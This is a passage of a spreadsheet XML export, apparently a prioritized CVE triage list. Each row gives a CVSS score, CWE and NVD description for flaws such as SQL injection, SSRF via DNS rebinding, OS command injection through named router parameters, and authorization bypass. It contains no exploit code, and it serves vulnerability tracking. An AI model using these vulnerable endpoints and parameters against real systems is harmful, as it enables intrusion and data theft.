        </is>
      </c>
      <c r="M1456" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80214</t>
        </is>
      </c>
    </row>
    <row r="1457">
      <c r="A1457" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1457" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-8044</t>
        </is>
      </c>
      <c r="C1457" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1457" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1457" s="5" t="inlineStr"/>
      <c r="F1457" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1457" s="5" t="inlineStr"/>
      <c r="H1457" s="5" t="inlineStr"/>
      <c r="I1457" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1457" s="5" t="inlineStr"/>
      <c r="K1457" s="5" t="inlineStr">
        <is>
          <t>CWE-88</t>
        </is>
      </c>
      <c r="L1457" s="5" t="inlineStr">
        <is>
          <t>CWE-88: Improper Neutralization of Argument Delimiters in a Command ('Argument Injection') vulnerability exists that could cause remote code execution by an attacker with a privileged account when malicious arguments are provided as backup configuration parameters.</t>
        </is>
      </c>
      <c r="M1457" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-8044</t>
        </is>
      </c>
    </row>
    <row r="1458">
      <c r="A1458" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1458" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81213</t>
        </is>
      </c>
      <c r="C1458" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1458" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1458" s="5" t="inlineStr"/>
      <c r="F1458" s="5" t="inlineStr"/>
      <c r="G1458" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H1458" s="5" t="inlineStr"/>
      <c r="I1458" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1458" s="5" t="inlineStr"/>
      <c r="K1458" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L1458" s="5" t="inlineStr">
        <is>
          <t>IBM Langflow OSS 1.0.0 through 1.11.5 could allow a remote attacker to obtain sensitive information from internal network resources due to improper validation of user-supplied URLs.</t>
        </is>
      </c>
      <c r="M1458" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81213</t>
        </is>
      </c>
    </row>
    <row r="1459">
      <c r="A1459" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1459" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81789</t>
        </is>
      </c>
      <c r="C1459" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1459" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1459" s="5" t="inlineStr"/>
      <c r="F1459" s="5" t="inlineStr"/>
      <c r="G1459" s="5" t="inlineStr"/>
      <c r="H1459" s="5" t="inlineStr"/>
      <c r="I1459" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1459" s="5" t="inlineStr"/>
      <c r="K1459" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L1459" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Arbitrary File Deletion in Advanced Product Fields Extended for WooCommerce &lt;= 3.1.6 versions.</t>
        </is>
      </c>
      <c r="M1459" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81789</t>
        </is>
      </c>
    </row>
    <row r="1460">
      <c r="A1460" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1460" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81889</t>
        </is>
      </c>
      <c r="C1460" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1460" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1460" s="5" t="inlineStr"/>
      <c r="F1460" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1460" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1460" s="5" t="inlineStr"/>
      <c r="I1460" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="J1460" s="5" t="inlineStr"/>
      <c r="K1460" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L1460" s="5" t="inlineStr">
        <is>
          <t>elFinder is an open-source file manager for web, written in JavaScript using jQuery UI. Prior to 2.1.70, elFinder URL uploads in php/elFinder.class.php can bypass server-side request forgery protections when PHP cURL is unavailable because validate_address() validates $info['ip'], but get_remote_contents() selects fsock_get_contents(), which connects to $arr['host'] and performs a second DNS resolution. An attacker able to submit a URL upload can use DNS rebinding to have the first resolution return a public address and the connection resolution return a loopback or private address, causing the internal HTTP response body to be stored as an uploaded file and made readable through elFinder. After a successful fetch, get_headers($url, true) separately requests the original hostname without reusing the validated and pinned connection, creating an additional blind server-side request forgery path even when curl_get_contents() is selected. This issue is fixed in version 2.1.70.</t>
        </is>
      </c>
      <c r="M1460" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81889</t>
        </is>
      </c>
    </row>
    <row r="1461">
      <c r="A1461" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1461" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82304</t>
        </is>
      </c>
      <c r="C1461" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1461" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1461" s="5" t="inlineStr"/>
      <c r="F1461" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1461" s="5" t="inlineStr"/>
      <c r="H1461" s="5" t="inlineStr"/>
      <c r="I1461" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J1461" s="5" t="inlineStr"/>
      <c r="K1461" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L1461" s="5" t="inlineStr">
        <is>
          <t>The Music Store  WordPress plugin before 1.4.5 does not sanitise and escape user input before using it in a SQL statement, leading to a SQL injection exploitable by unauthenticated users.</t>
        </is>
      </c>
      <c r="M1461" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82304</t>
        </is>
      </c>
    </row>
    <row r="1462">
      <c r="A1462" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1462" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82461</t>
        </is>
      </c>
      <c r="C1462" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1462" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1462" s="5" t="inlineStr"/>
      <c r="F1462" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1462" s="5" t="inlineStr"/>
      <c r="H1462" s="5" t="inlineStr"/>
      <c r="I1462" s="5" t="inlineStr">
        <is>
          <t>2026-08-29</t>
        </is>
      </c>
      <c r="J1462" s="5" t="inlineStr"/>
      <c r="K1462" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="L1462" s="5" t="inlineStr">
        <is>
          <t>pac4j-oidc before 6.5.6 fails to verify access token signatures, issuers, audiences, or expiry when extracting Keycloak realm and client roles. Attackers can forge access tokens with administrative roles paired with valid ID tokens to bypass authorization checks in applications relying on pac4j role validation.</t>
        </is>
      </c>
      <c r="M1462" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82461</t>
        </is>
      </c>
    </row>
    <row r="1463">
      <c r="A1463" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1463" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82475</t>
        </is>
      </c>
      <c r="C1463" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1463" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1463" s="5" t="inlineStr"/>
      <c r="F1463" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1463" s="5" t="inlineStr"/>
      <c r="H1463" s="5" t="inlineStr"/>
      <c r="I1463" s="5" t="inlineStr">
        <is>
          <t>2026-08-29</t>
        </is>
      </c>
      <c r="J1463" s="5" t="inlineStr"/>
      <c r="K1463" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L1463" s="5" t="inlineStr">
        <is>
          <t>iFlytek astron-agent through 1.1.1 contains an authorization bypass vulnerability in the copyFlow endpoint that fails to validate workflow ownership. Authenticated attackers can enumerate workflow identifiers and overwrite other tenants' workflows or copy private workflows to read their definitions.</t>
        </is>
      </c>
      <c r="M1463" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82475</t>
        </is>
      </c>
    </row>
    <row r="1464">
      <c r="A1464" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1464" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82684</t>
        </is>
      </c>
      <c r="C1464" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1464" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1464" s="5" t="inlineStr"/>
      <c r="F1464" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1464" s="5" t="inlineStr"/>
      <c r="H1464" s="5" t="inlineStr"/>
      <c r="I1464" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1464" s="5" t="inlineStr"/>
      <c r="K1464" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L1464" s="5" t="inlineStr">
        <is>
          <t>Tycon Systems TPDIN-Monitor-WEB3 versions 2.2.9 and prior are vulnerable to a Missing Authorization vulnerability. This could allow an attacker to extract system credentials, configurations, or flash contents.</t>
        </is>
      </c>
      <c r="M1464" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82684</t>
        </is>
      </c>
    </row>
    <row r="1465">
      <c r="A1465" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1465" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82712</t>
        </is>
      </c>
      <c r="C1465" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1465" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1465" s="5" t="inlineStr"/>
      <c r="F1465" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1465" s="5" t="inlineStr"/>
      <c r="H1465" s="5" t="inlineStr"/>
      <c r="I1465" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1465" s="5" t="inlineStr"/>
      <c r="K1465" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="L1465" s="5" t="inlineStr">
        <is>
          <t>Tycon Systems TPDIN-Monitor-WEB3 versions 2.2.9 and prior are vulnerable to a cross-site request forgery vulnerability. This could allow an attacker to perform state changing operations on the device.</t>
        </is>
      </c>
      <c r="M1465" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82712</t>
        </is>
      </c>
    </row>
    <row r="1466">
      <c r="A1466" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1466" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84068</t>
        </is>
      </c>
      <c r="C1466" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1466" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1466" s="5" t="inlineStr"/>
      <c r="F1466" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1466" s="5" t="inlineStr"/>
      <c r="H1466" s="5" t="inlineStr"/>
      <c r="I1466" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1466" s="5" t="inlineStr"/>
      <c r="K1466" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L1466" s="5" t="inlineStr">
        <is>
          <t>The Quentn WP WordPress plugin before 1.2.15 does not adequately escape a request parameter before using it in an unprepared SQL query, allowing unauthenticated attackers to extract arbitrary data from the database via SQL injection.</t>
        </is>
      </c>
      <c r="M1466" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84068</t>
        </is>
      </c>
    </row>
    <row r="1467">
      <c r="A1467" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1467" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84194</t>
        </is>
      </c>
      <c r="C1467" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1467" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1467" s="5" t="inlineStr"/>
      <c r="F1467" s="5" t="n">
        <v>0.014</v>
      </c>
      <c r="G1467" s="5" t="inlineStr"/>
      <c r="H1467" s="5" t="inlineStr"/>
      <c r="I1467" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J1467" s="5" t="inlineStr"/>
      <c r="K1467" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L1467" s="5" t="inlineStr">
        <is>
          <t>LibreNMS versions &gt;= 23.10.0 and &lt; 26.2.0 (fixed in 26.4.0) contain an authenticated OS command injection vulnerability in libvirt discovery. When libvirt support is enabled (enable_libvirt=true), the device hostname ($this-&gt;getDevice()-&gt;hostname) is concatenated into shell commands (ssh, virsh list/dumpxml/domstate) in VminfoLibvirt.php and passed to exec() without escapeshellarg() or argument separation. An authenticated admin can set a crafted device hostname to inject arbitrary OS commands, leading to remote code execution in the discovery worker context.</t>
        </is>
      </c>
      <c r="M1467" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84194</t>
        </is>
      </c>
    </row>
    <row r="1468">
      <c r="A1468" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1468" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84203</t>
        </is>
      </c>
      <c r="C1468" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1468" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1468" s="5" t="inlineStr"/>
      <c r="F1468" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1468" s="5" t="inlineStr"/>
      <c r="H1468" s="5" t="inlineStr"/>
      <c r="I1468" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J1468" s="5" t="inlineStr"/>
      <c r="K1468" s="5" t="inlineStr">
        <is>
          <t>CWE-613</t>
        </is>
      </c>
      <c r="L1468" s="5" t="inlineStr">
        <is>
          <t>Memos versions 0.26.0 through 0.30.0 fail to revoke refresh tokens when a user changes their password, allowing attackers to maintain account access. An attacker with a stolen refresh token can call the RefreshToken RPC to obtain new access tokens and rotate the refresh token indefinitely, bypassing the password change security measure.</t>
        </is>
      </c>
      <c r="M1468" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84203</t>
        </is>
      </c>
    </row>
    <row r="1469">
      <c r="A1469" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1469" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84452</t>
        </is>
      </c>
      <c r="C1469" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1469" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1469" s="5" t="inlineStr"/>
      <c r="F1469" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G1469" s="5" t="inlineStr">
        <is>
          <t>windows, python</t>
        </is>
      </c>
      <c r="H1469" s="5" t="inlineStr"/>
      <c r="I1469" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="J1469" s="5" t="inlineStr"/>
      <c r="K1469" s="5" t="inlineStr">
        <is>
          <t>CWE-306, CWE-942</t>
        </is>
      </c>
      <c r="L1469" s="5" t="inlineStr">
        <is>
          <t>Windows ML CLI is a command line tool for building portable, performant, and high-quality AI models for Windows ML. Prior to 0.4.0, the src/winml/modelkit/serve/cli_api.py component exposes WinML CLI commands through a localhost HTTP API without authentication and configures the allow_origins setting as a wildcard in both src/winml/modelkit/serve/cli_api.py and src/winml/modelkit/serve/app.py. A malicious website loaded by a user can send cross-origin requests to /v1/cli/build or /v1/cli/config and set the trust_remote_code parameter to true, which is converted to the --trust-remote-code command-line flag without validation. This reaches AutoConfig.from_pretrained with trust_remote_code=True in src/winml/modelkit/loader/_autoconfig.py and imports Python code from an attacker-controlled model repository, resulting in arbitrary code execution as the server user. This issue is fixed in version 0.4.0.</t>
        </is>
      </c>
      <c r="M1469" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84452</t>
        </is>
      </c>
    </row>
    <row r="1470">
      <c r="A1470" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1470" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85217</t>
        </is>
      </c>
      <c r="C1470" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1470" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1470" s="5" t="inlineStr"/>
      <c r="F1470" s="5" t="inlineStr"/>
      <c r="G1470" s="5" t="inlineStr"/>
      <c r="H1470" s="5" t="inlineStr"/>
      <c r="I1470" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1470" s="5" t="inlineStr"/>
      <c r="K1470" s="5" t="inlineStr">
        <is>
          <t>CWE-15</t>
        </is>
      </c>
      <c r="L1470" s="5" t="inlineStr">
        <is>
          <t>A maliciously crafted add-in, when installed and executed in Autodesk Fusion Desktop, can modify persistent network proxy settings without user notification or consent. A successful exploit may allow an attacker to redirect authenticated Fusion network traffic through an attacker-controlled proxy, potentially exposing sensitive information with the current user.</t>
        </is>
      </c>
      <c r="M1470" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85217</t>
        </is>
      </c>
    </row>
    <row r="1471">
      <c r="A1471" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1471" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85388</t>
        </is>
      </c>
      <c r="C1471" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1471" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1471" s="5" t="inlineStr"/>
      <c r="F1471" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1471" s="5" t="inlineStr">
        <is>
          <t>postgresql</t>
        </is>
      </c>
      <c r="H1471" s="5" t="inlineStr"/>
      <c r="I1471" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J1471" s="5" t="inlineStr"/>
      <c r="K1471" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L1471" s="5" t="inlineStr">
        <is>
          <t>Worklenz through 3.0.0 fails to properly validate the sort-field query parameter in pagination helper functions, allowing authenticated users to inject arbitrary PostgreSQL expressions into ORDER BY clauses. Attackers can use time-based and boolean-based blind SQL injection techniques to extract sensitive database content including password hashes from other tenants. This is an incomplete fix for CVE-2026-25947.</t>
        </is>
      </c>
      <c r="M1471" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85388</t>
        </is>
      </c>
    </row>
    <row r="1472">
      <c r="A1472" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1472" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85546</t>
        </is>
      </c>
      <c r="C1472" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1472" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1472" s="5" t="inlineStr"/>
      <c r="F1472" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1472" s="5" t="inlineStr"/>
      <c r="H1472" s="5" t="inlineStr"/>
      <c r="I1472" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1472" s="5" t="inlineStr"/>
      <c r="K1472" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="L1472" s="5" t="inlineStr">
        <is>
          <t>MISP contains a cross-site request forgery (CSRF) vulnerability in the sharing group quick-edit functionality. The addOrg, removeOrg, addServer, and removeServer actions share the __initialiseSGQuickEdit() helper, where the HTTP method validation intended to restrict these operations to POST requests was commented out.
As a result, these state-changing actions could be invoked using GET requests. An attacker could craft a URL targeting one of the affected actions and cause an authenticated MISP user with sufficient privileges to request it, for example through a malicious link or embedded web resource.
Successful exploitation could modify the membership of a MISP sharing group without the victim intentionally performing the operation. Depending on the action performed, an attacker could add or remove organisations or servers from a sharing group, potentially granting unintended access to information distributed through that sharing group or disrupting legitimate information sharing.
The patch restores HTTP method enforcement centrally in __initialiseSGQuickEdit() by calling allowMethod(['post']), ensuring that all four affected quick-edit operations require POST requests and are therefore subject to the application's normal protections for state-changing requests.</t>
        </is>
      </c>
      <c r="M1472" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85546</t>
        </is>
      </c>
    </row>
    <row r="1473">
      <c r="A1473" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1473" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86167</t>
        </is>
      </c>
      <c r="C1473" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1473" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1473" s="5" t="inlineStr"/>
      <c r="F1473" s="5" t="n">
        <v>0.016</v>
      </c>
      <c r="G1473" s="5" t="inlineStr"/>
      <c r="H1473" s="5" t="inlineStr"/>
      <c r="I1473" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="J1473" s="5" t="inlineStr"/>
      <c r="K1473" s="5" t="inlineStr">
        <is>
          <t>CWE-77, CWE-78</t>
        </is>
      </c>
      <c r="L1473" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was identified in Tenda HG10 300001138. Impacted is the function formgponConf of the file /boaform/admin/formgponConf of the component Boa. The manipulation of the argument fmgpon_loid leads to os command injection. Remote exploitation of the attack is possible. The exploit is publicly available and might be used.</t>
        </is>
      </c>
      <c r="M1473" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86167</t>
        </is>
      </c>
    </row>
    <row r="1474">
      <c r="A1474" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1474" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86185</t>
        </is>
      </c>
      <c r="C1474" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1474" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1474" s="5" t="inlineStr"/>
      <c r="F1474" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1474" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1474" s="5" t="inlineStr"/>
      <c r="I1474" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J1474" s="5" t="inlineStr"/>
      <c r="K1474" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="L1474" s="5" t="inlineStr">
        <is>
          <t>Bilibili Desktop through 1.18.0 disables TLS certificate verification process-wide and executes unsigned remote JavaScript configuration without integrity checks. An attacker in an on-path network position can intercept configuration fetches, inject arbitrary JavaScript executed in the renderer with access to the privileged IPC bridge, and execute system commands or steal login credentials.</t>
        </is>
      </c>
      <c r="M1474" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86185</t>
        </is>
      </c>
    </row>
    <row r="1475">
      <c r="A1475" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1475" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86299</t>
        </is>
      </c>
      <c r="C1475" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1475" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1475" s="5" t="inlineStr"/>
      <c r="F1475" s="5" t="n">
        <v>0.02</v>
      </c>
      <c r="G1475" s="5" t="inlineStr"/>
      <c r="H1475" s="5" t="inlineStr"/>
      <c r="I1475" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J1475" s="5" t="inlineStr"/>
      <c r="K1475" s="5" t="inlineStr">
        <is>
          <t>CWE-77, CWE-78</t>
        </is>
      </c>
      <c r="L1475" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was detected in Linksys RE7000 2.0.15. This affects the function platform_event_pingTest of the file /cgi-bin/json.cgi?PingTest of the component PingTest Handler. The manipulation of the argument pingTestIp/pingTestPktSize/pingTestTimes results in os command injection. The attack can be launched remotely. The exploit is now public and may be used.</t>
        </is>
      </c>
      <c r="M1475" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86299</t>
        </is>
      </c>
    </row>
    <row r="1476">
      <c r="A1476" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1476" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86437</t>
        </is>
      </c>
      <c r="C1476" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1476" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1476" s="5" t="inlineStr"/>
      <c r="F1476" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1476" s="5" t="inlineStr"/>
      <c r="H1476" s="5" t="inlineStr"/>
      <c r="I1476" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J1476" s="5" t="inlineStr"/>
      <c r="K1476" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L1476" s="5" t="inlineStr">
        <is>
          <t>Lara Dashboard before 1.3.2 authorizes the POST /admin/settings/core-upgrades/upload endpoint with only the settings.edit permission, allowing non-Superadmin administrators to upload and extract arbitrary zip archives over the live application source code. Attackers can upload a malicious archive containing modified application files such as routes/web.php with embedded system commands, which execute as the web server user with access to environment secrets and database credentials.</t>
        </is>
      </c>
      <c r="M1476" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86437</t>
        </is>
      </c>
    </row>
    <row r="1477">
      <c r="A1477" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1477" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86438</t>
        </is>
      </c>
      <c r="C1477" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1477" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1477" s="5" t="inlineStr"/>
      <c r="F1477" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G1477" s="5" t="inlineStr"/>
      <c r="H1477" s="5" t="inlineStr"/>
      <c r="I1477" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J1477" s="5" t="inlineStr"/>
      <c r="K1477" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L1477" s="5" t="inlineStr">
        <is>
          <t>Lara Dashboard before 1.3.2 fails to authorize the MarketplaceModuleBrowser installModule Livewire action, allowing non-Superadmin administrators to install modules. Attackers can download and auto-activate arbitrary PHP modules from the marketplace over unsigned HTTP requests, achieving remote code execution.</t>
        </is>
      </c>
      <c r="M1477" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86438</t>
        </is>
      </c>
    </row>
    <row r="1478">
      <c r="A1478" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1478" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86509</t>
        </is>
      </c>
      <c r="C1478" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1478" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1478" s="5" t="inlineStr"/>
      <c r="F1478" s="5" t="n">
        <v>0.004</v>
